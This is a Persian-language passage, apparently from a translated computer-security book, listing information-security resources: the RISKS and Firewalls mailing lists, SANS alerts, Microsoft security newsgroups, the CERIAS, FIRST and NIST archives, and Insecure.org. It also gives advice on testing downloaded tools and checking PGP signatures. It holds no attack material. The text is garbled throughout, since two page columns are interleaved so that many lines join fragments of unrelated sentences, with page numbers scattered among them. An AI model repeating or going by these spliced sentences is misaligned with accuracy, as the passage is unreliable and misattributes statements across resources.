ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﺍﺯ ﻟﺤـﺎﻅ ﺭﺳـﻤﻲ ﺑﻌﻨـﻮﺍﻥ ﺍﺗـﺎﻕ ﮔﻔﺘﮕـﻮﻱ ﻣﺤﺮﻣﺎﻧﮕﻲ ،ﺍﻣﻨﻴﺖ ،ﻗـﺎﻧﻮﻥ ،ﻭ ﺍﻃﻼﻋـﺎﺕ ﺯﻳﺮﺯﻣﻴﻨـﻲ ﺭﺍﻳﺎﻧـﻪﺍﻱ.
ﻣﺆﺳــﺴﻪ ACMﺩﺭﺧــﺼﻮﺹ ﻣﺨــﺎﻃﺮﺍﺕ ﻛــﺎﺭﺑﺮﺩ ﺭﺍﻳﺎﻧــﻪﻫــﺎ ﻭ ﺑﺮﺧﻼﻑ ﻧﺎﻡ ﺁﻥ ،ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺩﺍﺭﺍﻱ ﻣﻄﺎﻟﺐ "ﺯﻳﺮﺯﻣﻴﻨﻲ" ﻧﻴﺴﺖ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺮﺍﻱ ﻋﻤﻮﻡ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ .ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺩﺭ -ﺑﻠﻜﻪ ﺩﺭﺑﺮﮔﻴﺮﻧﺪﺓ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﻣﺤﻴﻂ ﭘﻴﺮﺍﻣـﻮﻧﻲ ﺭﺍﻳﺎﻧـﻪ
ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘـﺴﺘﻲ ﻧﻴـﺎﺯ ﺑـﻪ ﺗﺄﻳﻴـﺪ ﺳـﺮﺩﺑﻴﺮ ﺁﻥ ﺩﺍﺭﺩ ﻭ ﺩﺭ ﺁﻥ ﻣﻲﺑﺎﺷﺪ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﺩﺭ ﺳﺎﻝ ۲۰۰۰ﻓﻌﺎﻟﻴﺖ ﺍﻳﻦ ﻓﻬﺮﺳـﺖ ﭘـﺴﺘﻲ
ﻣﺒﺎﺣﺜﻲ ﺩﺭﺧﺼﻮﺹ ﻣﺨﺎﻃﺮﺍﺗﻲ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫـﺎ ﻭ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺷـﺪﻥ ﻣﺘﻮﻗﻒ ﺷﺪ ﻭ ﻫﻨﻮﺯ ﻣﻌﻠﻮﻡ ﻧﻴﺴﺖ ﺁﻳﺎ ﻗﺮﺍﺭ ﺍﺳﺖ ﻣﺠـﺪﺩﹰﺍ ﻓﻌﺎﻟﻴـﺖ
ﺑﺮﺍﻱ ﺟﻮﺍﻣﻊ ﺩﺭ ﭘﻲ ﺩﺍﺭﺩ ﻋﻨﻮﺍﻥ ﻣﻲﮔﺮﺩﺩ .ﭘﻴﺎﻣﻬﺎﻱ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺁﻥ ﺁﻏﺎﺯ ﺷﻮﺩ ﻳﺎ ﻧﻪ .ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﺩﺭ ﻗﺎﻟﺐ ﮔـﺮﻭﻩ ﺧﺒـﺮﻱ
ﭘﺴﺘﻲ ﺩﺭ ﮔﺮﻭﻩ ﺧﺒﺮﻱ comp.risksﻧﻴﺰ ﻣﻨﺘـﺸﺮ ﻣـﻲﺷـﻮﺩ ﻭ comp.society.cu-digestﺩﺭ Usenetﻭﺟﻮﺩ ﺩﺍﺷﺖ؛ ﻭ
ﻋﻀﻮﻳﺖ ﺩﺭ ﺍﻳﻦ ﮔﺮﻭﻩ ﺧﺒﺮﻱ ﺭﺍﻩ ﺑﻬﺘﺮﻱ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﭘﻴﺎﻣﻬﺎﻱ ﮔﺮﻭﻩ ﺧﺒﺮﻱ ﺑﻬﺘﺮﻳﻦ ﺍﺑﺰﺍﺭ ﺑﺮﺍﻱ ﺍﻧﺘﺸﺎﺭ ﺁﻥ ﺑﻮﺩ .ﺍﻳﻦ ﻓﻬﺮﺳـﺖ ﺩﺭ
ﻓﻬﺮﺳــﺖ ﭘــﺴﺘﻲ ﺍﺳــﺖ .ﺍﮔــﺮ ﺍﺯ ﺧــﺪﻣﺎﺕ Usenetﺍﺳــﺘﻔﺎﺩﻩ ﻣﺤﻠﻬﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎﻳﮕﺎﻧﻲ ﺷﺪﻩ ﺍﺳـﺖ ،ﺍﺯ ﺟﻤﻠـﻪ ﺩﺭ
ﻧﻤــــﻲﻛﻨﻴــــﺪ )ﻭ ﻧﻤــــﻲﺧﻮﺍﻫﻴــــﺪ ﭘﻴﺎﻣﻬــــﺎ ﺭﺍ ﺍﺯ ﭘﺎﻳﮕــــﺎﻩ ﻭﺏ
ﺁﺩﺭﺱ ﺯﻳﺮ:
http://groups.google.comﺩﺭﻳﺎﻓﺖ ﻭ ﻣﻄﺎﻟﻌﻪ ﻧﻤﺎﻳﻴـﺪ( ﻣـﻲ ﺗﻮﺍﻧﻴـﺪ http://sun.soci.niu.edu/~cudigest
ﺩﺭﺧﻮﺍﺳــﺖ ﻋــﻀﻮﻳﺖ ﺧــﻮﺩ ﺭﺍ ﺑــﻪ ﺁﺩﺭﺱ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ
Firewalls
risks-request@csl.sri.comﺑﻔﺮﺳـــــﺘﻴﺪ ﻭ ﻛﻠﻤـــــﺔ
ﻓﻬﺮﺳﺖ ﭘـﺴﺘﻲ "ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ" ) (firewallsﻛـﻪ ﺗﻮﺳـﻂ
" "subscribeﺭﺍ ﺩﺭ ﻣﺘﻦ ﺁﻥ ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
ﻛﻨﺴﺮﺳﻴﻮﻡ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺪﻳﺮﻳﺖ ﻭ ﻣﻴﺰﺑﺎﻧﻲ ﻣـﻲﺷـﻮﺩ
ﻣﻮﺿـﻮﻋﺎﺗﻲ ﻛـﻪ ﺩﺭ ﮔﺬﺷـﺘﻪ ﺩﺭ ﺍﻳـﻦ ﻓﻬﺮﺳـﺖ ﭘـﺴﺘﻲ ﻣﻄــﺮﺡ
ﻣﺤﻞ ﺗﺒﺎﺩﻝ ﻧﻈﺮ ﺍﻓﺮﺍﺩﻱ ﺍﺳﺖ ﻛـﻪ ﻣﺎﻳﻠﻨـﺪ ﺩﺭ ﻣـﻮﺭﺩ ﻃﺮﺍﺣـﻲ،
ﺷﺪﻩﺍﻧﺪ ﻧﻴﺰ ﺩﺭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ) googleﺁﺩﺭﺱ ﻓـﻮﻕ( ﻭ ﻳـﺎ ﭘﺎﻳﮕـﺎﻩ
ﺗﻮﻟﻴﺪ ،ﻋﻤﻠﻜﺮﺩ ،ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﻓﻠﺴﻔﺔ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺩﻳـﻮﺍﺭﺓ
ﻭﺏ http://www.risks.orgﻣﻮﺟﻮﺩ ﻣﻲﺑﺎﺷﻨﺪ.
ﺁﺗﺶ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺤﺚ ﻧﻤﺎﻳﻨﺪ .ﺑﺮﺍﻱ ﻋـﻀﻮﻳﺖ ﺩﺭ ﺍﻳـﻦ ﻓﻬﺮﺳـﺖ
SANS Security Alert Consensus ﭘﺴﺘﻲ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ:
ﺍﻳــﻦ ﻓﻬﺮﺳــﺖ ﭘــﺴﺘﻲ ﻳــﻚ ﭼﻜﻴــﺪﺓ ﻫﻔﺘﮕــﻲ ﺍﺯ ﺍﻋــﻼﻥﻫــﺎ ﻭ http://www.isc.org/services/public/lists/firewa
lls.html
ﻫﺸﺪﺍﺭﻫﺎﻱ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﻭ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﻣﺨﺘﻠـﻒ ﺍﺳـﺖ.
ﻋﻀﻮﻳﺖ ﺩﺭ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻨﻬﺎ ﺑﻪ ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ ﻻ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺍﺳﺖ )ﻣﻌﻤﻮ ﹰ
ﻻ ﺩﺭ ﭘﻴﺎﻣﻬﺎﻱ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﻣﻌﻤﻮ ﹰ
ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺧـﺎﺹ ﻣﺤـﺪﻭﺩ ﺷـﻮﺩ .ﺑـﺮﺍﻱ ﻋـﻀﻮﻳﺖ، ﺣﺪ ﺩﻫﻬﺎ ﭘﻴﺎﻡ ﺩﺭ ﺭﻭﺯ ﻛﻪ ﮔﺎﻫﻲ ﺑﻪ ﺑﻴﺶ ﺍﺯ ﺻﺪﻫﺎ ﭘﻴﺎﻡ ﻫﻢ ﻣﻲﺭﺳﺪ( .ﺑﺮﺍﻱ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ http://sans.orgﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ. ﺭﺍﺿﻲ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﻋﻀﺎﻳﻲ ﻛـﻪ ﻧﻤـﻲﺧﻮﺍﻫﻨـﺪ ﺻـﻨﺪﻭﻕ ﭘـﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲﺷﺎﻥ ﻣﻤﻠﻮ ﺍﺯ ﭘﻴﺎﻣﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘـﺴﺘﻲ
ﮔﺮﻭﻩﻫﺎﻱ Usenet ﺑﺎﺷﺪ ،ﮔﺰﻳﻨـﻪﺍﻱ ﺑـﺮﺍﻱ ﺍﺭﺳـﺎﻝ ﻳـﻚ ﻧـﺴﺨﺔ ﺧﻼﺻـﻪﺷـﺪﻩ ﺍﺯ
ﭘﻴﺎﻣﻬﺎﻱ ﻫﺮ ﺭﻭﺯ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻭ ﺍﺻـﻞ ﭘﻴﺎﻣﻬـﺎ ﺩﺭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ
ﮔﺮﻭﻩﻫﺎﻱ ﺧﺒﺮﻱ ﻣﺘﻌﺪﺩﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ
ﺑﺎﻳﮕﺎﻧﻲ ﻣﻲﮔﺮﺩﺩ.
ﺑﺨﺶ ﺷﺸﻢ
microsoft.public.security, ﺁﻥ ﺍﺷﺎﺭﻩ ﺷﺪ ،ﺩﺭﺧﺼﻮﺹ ﮔﺮﻭﻩ ﻫـﺎﻱ ﺧﺒـﺮﻱ ﺑﻄـﻮﺭ ﻣـﻀﺎﻋﻒ
microsoft.public.win2000.security,
microsoft.public.windowsxp.security_admin ﺻﺪﻕ ﻣﻲﻛﻨﺪ.
٥٠٨
) NIHﻣﺆﺳﺴﺎﺕ ﻣﻠﻲ ﺳﻼﻣﺘﻲ( ﺍﺯ ﺳﻴــﺴﺘﻢ gopherﻭ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎﻱ ﻭﺏ ﻭ ﺍﺯ ﻳــﻚ
ﺻــﻔﺤﺔ ﻭﺏ ﺍﺻــﻠﻲ NIHﻣﺠﻤﻮﻋــﺔ ﻭﺳــﻴﻌﻲ ﺍﺯ ﺁﺩﺭﺳــﻬﺎﻱ ﺑﺎﻳﮕﺎﻧﻲ ﺷﺨﺼﻲ )ﻣﺘﻌﻠﻖ ﺑﻪ (Spaffordﺁﻏـﺎﺯ ﺑـﻪ ﻛـﺎﺭ ﻛـﺮﺩ ،ﺑـﻪ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺎﻳﺮ ﻣﻨﺎﺑﻊ ﻭ ﺑﺎﻳﮕﺎﻧﻲﻫﺎﻱ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ: ﺑﺎﻳﮕﺎﻧﻲ ﺁﺯﻣﺎﻳﺸﮕﺎﻩ COASTﺗﺒﺪﻳﻞ ﺷﺪ ،ﻭ ﺳﭙﺲ ﺑﻪ ﺑﺎﻳﮕـﺎﻧﻲ
http://www.alw.nih.gov/security/ ﻓﻌﻠﻲ ﻳﻌﻨﻲ CERIASﻣﺒﺪﻝ ﮔﺸﺖ .ﺍﻳﻦ ﻣﺮﻛـﺰ ﺩﺭ ﺩﻫـﺔ ﺍﻭﻝ
ﻓﻌﺎﻟﻴﺖ ﺧـﻮﺩ ﺑﻌﻨـﻮﺍﻥ ﺑﺰﺭﮔﺘـﺮﻳﻦ ﺑﺎﻳﮕـﺎﻧﻲ ﻣﻄﺎﻟـﺐ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ
ﻣﻨﺎﺑﻊ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﺪ.
ﺩﺭ ﺍﻳﻦ ﻗﺴﻤﺖ ﺑﻪ ﻣﻌﺮﻓﻲ ﺑﺮﺧﻲ ﺍﺑﺰﺍﺭﻫﺎ ﻭ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻃﻲ ﺳﺎﻟﻴﺎﻥ ﺍﺧﻴﺮ ،ﺍﻳﻦ ﺑﺎﻳﮕﺎﻧﻲ ﻭ ﺑﺮﺧﻲ ﻓﻬﺮﺳـﺘﻬﺎ ﺑـﻪ ﻧـﻮﻋﻲ ﺍﺯ
ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﻫﻢ ﺍﻧﺸﻌﺎﺏ ﻳﺎﻓﺘﻪﺍﻧﺪ ﻭ ﻧﺴﺒﺖ ﺑﻪ ﮔﺬﺷﺘﻪ ﻣﻄﺎﻟﺐ ﻛﻤﺘـﺮﻱ ﺭﻭﻱ
ﺍﻣﻨﻴﺖ ﭘﺎﻳﮕﺎﻩﻫﺎﻱ ﻭﺏ ﻣﻔﻴﺪ ﻭﺍﻗﻊ ﺷﻮﻧﺪ .ﮔﺮﭼﻪ ﺍﻳﻦ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﺁﻧﻬﺎ ﻣﻨﺘﺸﺮ ﻣﻲ ﺷﻮﺩ )ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺗﺠﺎﺭﻱ ﺩﺍﺭﺍﻱ ﻣﻨـﺎﺑﻌﻲ
ﺭﺍﻳﮕﺎﻥ ﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﺑﺨﺸﻲ ﺍﺯ ﺁﻧﻬـﺎ ﺑـﻪ ﻃـﺮﻕ ﻣﺨﺘﻠـﻒ ﺗﻮﺳـﻂ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻭ ﭘﺮﺩﺍﺧﺖ ﻛﺎﺭﻣﺰﺩ ﺑﻪ ﻳﻚ ﻣﺘـﺼﺪﻱ ،ﺑﺎﻳﮕـﺎﻧﻲ
ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻧﺸﺎﻥ ﻣﺤﺪﻭﺩ ﺷﺪﻩﺍﻧﺪ )ﺑﻪﻋﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻧﻤﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﺟﺎﻣﻊﺗﺮﻱ ﺩﺭﺳﺖ ﻛﺮﺩﻩﺍﻧـﺪ( .ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ،ﺍﻳـﻦ ﺑﺎﻳﮕـﺎﻧﻲ ﻣـﻲﺗﻮﺍﻧـﺪ
ﺍﻫﺪﺍﻑ ﺗﺠﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ ﻭ ﻳﺎ ﺁﻧﺮﺍ ﺩﺭ ﻛﻨﺎﺭ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺭﻭﻱ ﺩﻳـﺴﻜﻬﺎﻱ ﻣﺠﻤﻮﻋــﻪﺍﻱ ﻋﻈــﻴﻢ ﺍﺯ ﺍﺑﺰﺍﺭﻫــﺎ ﻭ ﺍﺳــﻨﺎﺩ ﻣﻔﻴــﺪ ﺷــﺎﻣﻞ ﺑﺮﺧــﻲ
ﻓﺸﺮﺩﺓ ﻣﺤﺼﻮﻻﺕ ﺩﻳﮕﺮ ﻗـﺮﺍﺭ ﺩﺍﺩ( ﻭ ﻳـﺎ ﺑﻮﺳـﻴﻠﺔ ﻗـﻮﺍﻧﻴﻦ ﻭ ﺿـﻮﺍﺑﻂ ﻣﻮﺿﻮﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﺑﺎﻳﮕﺎﻧﻲﻫﺎﻱ ﺩﻳﮕـﺮ ﻳﺎﻓـﺖ ﻧﻤـﻲﺷـﻮﻧﺪ ﺭﺍ ﺩﺭ
ﺩﻭﻟﺖ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ )ﺑﻪﻋﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺍﮔـﺮ ﺣـﺎﻭﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ ﺑﺎﺷـﻨﺪ، ﺍﺧﺘﻴﺎﺭﺗﺎﻥ ﻗﺮﺍﺭ ﺩﻫﺪ؛ ﺑﻌﻼﻭﺓ ﻣﺴﺘﻨﺪﺍﺗﻲ ﻛﻪ ﺗﻮﺳﻂ CERIASﻭ
ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻳﻲ ﺍﺯ ﻧﻈﺮ ﺻـﺎﺩﺭﺍﺕ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﺍﻣـﺎﻛﻦ ﺧـﺎﺹ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ(. ﻳﺎ ﻣﺆﺳﺴﺎﺕ ﻫﻤﻜﺎﺭ ﺁﻥ ﺗﻮﻟﻴﺪ ﻣﻲﺷﻮﻧﺪ .ﻋﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ،
ﻣﺴﺘﻨﺪﺍﺗﻲ ﻛﻪ ﻫﻤﺮﺍﻩ ﺑﺎ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺗﻮﺯﻳﻊ ﻣﻲﺷﻮﻧﺪ ﺭﺍ ﺁﺩﺭﺳﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻣﻨﺎﺑﻊ ﺩﻳﮕـﺮ ﻧﻴـﺰ ﺩﺭ
ﺑﻪ ﺩﻗﺖ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺍﮔﺮ ﺩﺭ ﻣـﻮﺭﺩ ﻧﺤـﻮﺓ ﺍﺳـﺘﻔﺎﺩﺓ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺁﺩﺭﺱ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺍﻳﻦ ﻣﺮﻛﺰ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ:
ﺻﺤﻴﺢ ﻭ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺁﻥ ﺗﺮﺩﻳﺪ ﺩﺍﺭﻳﺪ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑـﺎ http://www.cerias.purdue.edu/infosec/
ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﺁﻧﻬﺎ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ. ftp://ftp.cerias.purdue.edu
٥٠٦
ﺍﮔﺮﭼﻪ ﻣﺎ ﺑﻴﺸﺘﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻓﻬﺮﺳـﺖ ﺁﻣـﺪﻩﺍﻧـﺪ ﺭﺍ ) FIRSTﺗﻴﻢ ﺍﻳﻤﻨﻲ ﻭ ﻣﺮﻛﺰ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎ(
ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩﻩﺍﻳﻢ ،ﺍﻣﺎ ﻧﻤﻲﺗـﻮﺍﻧﻴﻢ ﻣـﺴﺌﻮﻟﻴﺖ ﻋﻤﻠﻜـﺮﺩ ﻣﺆﺳﺴﻪﺍﻱ ﻛﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺑﻴﺮﺧﺎﻧـﺔ ﺁﻥ ﺣـﺎﻭﻱ ﻳـﻚ ﺑﺎﻳﮕـﺎﻧﻲ
ﺻﺤﻴﺢ ﻧﺴﺨﻪﺍﻱ ﻛﻪ ﺷﻤﺎ ﺁﻧﺮﺍ ﺩﺭﻳﺎﻓﺖ ﻛـﺮﺩﻩﺍﻳـﺪ ﻭ ﺍﻳﻨﻜـﻪ ﺁﻳـﺎ ﻭﺳــﻴﻊ ﺍﺯ ﻣﻄﺎﻟــﺐ ،ﺍﺯ ﺟﻤﻠــﻪ ﺁﺩﺭﺳــﻬﺎﻱ ﺻــﻔﺤﺎﺕ ﻭﺏ ﺳــﺎﻳﺮ
ﻛﺎﺭﺑﺮﺩ ﺁﻥ ﺩﺭ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﺸﻜﻠﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﻳﺎ ﺧﻴﺮ ﺭﺍ ﺑـﺮ ﺗﻴﻤﻬﺎﻱ FIRSTﻣﻲﺑﺎﺷﺪ:
http://www.first.org
ﻋﻬﺪﻩ ﺑﮕﻴﺮﻳﻢ .ﻣﺸﺎﺑﻪ ﻫﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﻳﮕـﺮ ،ﺍﺑﺘـﺪﺍ ﺍﻳـﻦ ﺍﺑﺰﺍﺭﻫـﺎ ﺭﺍ
ﺑﻴﺎﺯﻣﺎﻳﻴﺪ ﻭ ﺳﭙﺲ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ. NIST CSRC
ﺑﺨــﺶ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻣﺆﺳــﺴﻪ ﻣﻠــﻲ ﻓﻨــﺎﻭﺭﻱ ﻭ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩ
ﺑﺮﺧﻲ ﺍﺯ ﺗﻮﺯﻳﻊﻛﻨﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ،ﺩﺍﺭﺍﻱ ﻳﻚ ﻛﻠﻴﺪ PGPﺑﺮﺍﻱ ) ٥٠٧(NISTﺑﺎﻳﮕﺎﻧﻲ ﻗﺎﺑﻞ ﺍﻋﺘﻤـﺎﺩ ،ﻣﻔﻴـﺪ ،ﻭ ﺟـﺎﻣﻌﻲ ﺍﺯ ﺍﺳـﻨﺎﺩ ﻭ
ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻫﺴﺘﻨﺪ .ﺍﻳﻦ ﺍﻣﻀﺎ ﺑﻪ ﺷـﻤﺎ ﺍﻣﻜـﺎﻥ ﻣـﻲﺩﻫـﺪ ﺍﺑﺰﺍﺭﻫﺎ ﺩﺍﺭﺩ:
ﺑﺘﻮﺍﻧﻴﺪ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ ﻛﻪ ﺁﻳـﺎ ﻧـﺴﺨﺔ ﻧـﺮﻡ ﺍﻓـﺰﺍﺭﻱ ﻛـﻪ ﺷـﻤﺎ http://csrc.nist.gov/index.html
ﺩﺭﻳﺎﻓﺖ ﻛﺮﺩﻩﺍﻳﺪ ﻫﻤﺎﻥ ﻧﺴﺨﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﻧﻮﻳـﺴﻨﺪﺓ ﺁﻥ
Insecure.org
ﺑﻪ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺗﺒﺪﻳﻞ ﺷﺪﻩ ﻳﺎ ﺧﻴﺮ .ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ ﺍﻳـﻦ ﺍﻣـﻀﺎ ﭘﺎﻳﮕﺎﻩ ﺍﺻﻠﻲ ﺍﺑﺰﺍﺭ ﭘﻮﻳﺶ ﭘﻮﺭﺕ ،nmapﻛﻪ ﺩﺭ ﺁﻥ ﺁﺩﺭﺳـﻬﺎﻱ
ﺿﻤﺎﻧﺘﻲ ﺩﺭ ﻗﺒﺎﻝ ﻣﺸﺮﻭﻋﻴﺖ ﺧﻮﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﻮﺟﻮﺩ ﻧﻤﻲﺁﻭﺭﺩ.
ﺑﺨﺶ ﺷﺸﻢ
ﻓﺮﺍﻣﻴﻦ ،ﻭ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ )ﻛﻪ ﺍﻳﻤﻨﻲ ﺁﻥ ﺑﺎ ﺗﻜﻴﻪ ﺑﺮ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﺗﻮﻟﻴﺪ ﻳﻚ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻣـﺴﺘﻘﻞ ﺑـﺮﺍﻱ ﻫـﺮ ﺑـﺴﺘﺔ
ﭘﺪﻳﺪ ﺁﻣﺪﻩ ﺍﺳﺖ( .ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﭘـﺮﻭﮊﺓ OpenBSDﻃﺮﺍﺣـﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍ ﻃﻲ ﻛﻨﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺭﺍ
ﺷﺪ ،ﺍﻣﺎ ﻧﺴﺨﺔ ﻗﺎﺑﻞ ﺍﻧﺘﻘـﺎﻝ ﺁﻥ ﺭﻭﻱ ﻏﺎﻟـﺐ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭﻳﺎﻓﺖ ﻣﻲﺩﺍﺭﻧﺪ ﻧﻴﺰ ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨـﻴﻢ ﻛـﻪ ﭘـﻴﺶ ﺍﺯ
Unixﻭ ﺑﺴﻴﺎﺭﻱ ﺩﻳﮕﺮ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻗﺎﺑـﻞ ﺍﺟـﺮﺍ ﺩﺭﻳﺎﻓﺖ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺪﻭﻥ ﺍﻣﻀﺎ ،ﺣﺘﻤﹰﺎ ﭼﻨﺪ ﻣﻨﺒﻊ ﺩﻳﮕـﺮ ﺭﺍ ﻧﻴـﺰ
